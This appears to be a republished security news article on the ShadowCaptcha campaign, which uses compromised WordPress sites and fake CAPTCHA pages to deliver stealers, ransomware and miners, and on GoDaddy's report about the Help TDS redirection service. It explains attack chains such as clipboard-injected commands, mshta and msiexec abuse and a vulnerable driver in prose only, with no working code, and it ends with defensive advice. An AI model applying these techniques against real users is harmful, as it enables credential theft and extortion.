A broad-ranging cyber assault has emerged, leveraging over 100 compromised WordPress sites to lure unsuspecting visitors into deceptive CAPTCHA verification pages. This insidious operation employs the ClickFix social engineering technique to propagate information stealers, ransomware, and cryptocurrency mining software.
First identified in August 2025, this extensive cybercrime effort has been designated as ShadowCaptcha by the Israel National Digital Agency.
“The campaign exhibits a seamless integration of social engineering, living-off-the-land binaries (LOLBins), and multi-stage payload delivery to secure and maintain access to targeted systems,” noted researchers Shimi Cohen, Adi Pick, Idan Beit Yosef, Hila David, and Yaniv Goldman in their findings.
The nefarious objectives of ShadowCaptcha involve gathering sensitive information through credential harvesting, exfiltrating browser data, executing cryptocurrency miners for illicit gains, and potentially instigating ransomware outbreaks.
The attack vector initiates when unsuspecting users navigate to a compromised WordPress site imbued with malicious JavaScript code. This code initiates a redirection sequence leading victims to counterfeit Cloudflare or Google CAPTCHA pages.
From that point, the attack bifurcates into two paths, determined by the displayed ClickFix instructions: one utilizes the Windows Run dialog, while the other prompts victims to save a page as an HTML Application (HTA), subsequently executing it via mshta.exe.
The flow initiated through the Windows Run dialog culminates in the deployment of Lumma and Rhadamanthys stealers via MSI installers executed with msiexec.exe or through remotely hosted HTA files activated by mshta.exe. Conversely, executing the saved HTA file triggers the installation of Epsilon Red ransomware.
It is noteworthy that the exploitation of ClickFix lures to deceive users into downloading malicious HTA files associated with the Epsilon Red ransomware was previously documented by CloudSEK.
“The compromised ClickFix page automatically executes obfuscated JavaScript that employs ‘navigator.clipboard.writeText’ to surreptitiously copy a malicious command to the user’s clipboard, relying on users to unwittingly paste and execute it,” the researchers elaborated.
The attacks are distinguished by the deployment of anti-debugger techniques to obstruct inspection of web pages using browser developer tools, alongside DLL side-loading to execute malicious code masquerading as legitimate processes.
Select campaigns within ShadowCaptcha have been identified as disseminating an XMRig-based cryptocurrency miner, with certain variants retrieving mining configurations from a Pastebin URL, allowing for dynamic adjustments of parameters.
When mining payloads are deployed, attackers have additionally been reported to implant a vulnerable driver (“WinRing0x64.sys”) to secure kernel-level access, enabling interaction with CPU registers to enhance mining efficacy.
Geographically, the majority of the compromised WordPress sites are situated in Australia, Brazil, Italy, Canada, Colombia, and Israel, spanning sectors such as technology, hospitality, legal/finance, healthcare, and real estate.
To counter the threats embodied by ShadowCaptcha, it is imperative to educate users on recognizing ClickFix campaigns, implement network segmentation to inhibit lateral movement, and ensure that WordPress sites remain regularly updated and fortified with multi-factor authentication (MFA) protections.
“ShadowCaptcha illustrates the evolution of social engineering attacks into comprehensive cyber operations,” the researchers asserted. “By deceiving users into executing built-in Windows tools and layering obfuscated scripts with vulnerable drivers, operators achieve stealthy persistence and can pivot between data theft, crypto mining, or ransomware.”
This revelation coincides with GoDaddy’s disclosure regarding the evolution of Help TDS, a traffic distribution system that has been active since 2017 and is linked to various malicious operations, including VexTrio Viper.
Help TDS supplies partners and affiliates with PHP code templates that are injected into WordPress sites, redirecting users to malicious destinations in line with targeted criteria.
“The operation is adept at tech support scams, relying on full-screen browser manipulation and exit prevention techniques to ensnare victims within fraudulent Microsoft Windows security alert pages, supplemented by fallback monetization via dating, cryptocurrency, and sweepstakes scams,” remarked security researcher Denis Sinegubko in his analysis.
Noteworthy malware campaigns leveraging Help TDS in recent years include DollyWay, Balada Injector, and DNS TXT redirects. The scam pages employ JavaScript to force browsers into full-screen mode, presenting counterfeit alerts and CAPTCHA challenges in an effort to evade automated security scans.
The operators behind Help TDS have reportedly developed a malicious WordPress plugin dubbed “woocommerce_inputs” between late 2024 and August 2025, facilitating the redirection functionality along with steadily integrating credential harvesting, geographic filtering, and sophisticated evasion techniques. This plugin is estimated to be residing on over 10,000 sites globally.
Disguised as WooCommerce to avert detection by site owners, the malicious plugin is solely installed by attackers following the compromise of WordPress sites through pilfered administrator credentials.
“This plugin serves a dual purpose as a traffic monetization tool and a mechanism for credential harvesting, epitomizing the ongoing evolution from basic redirection capabilities to a comprehensive malware-as-a-service model,” asserted GoDaddy.
“By offering pre-packaged solutions, including command-and-control infrastructure, standardized PHP injection templates, and fully-featured malicious WordPress plugins, Help TDS has significantly lowered the entry barrier for cybercriminals aiming to monetize compromised websites.”
Source link: Thehackernews.com.
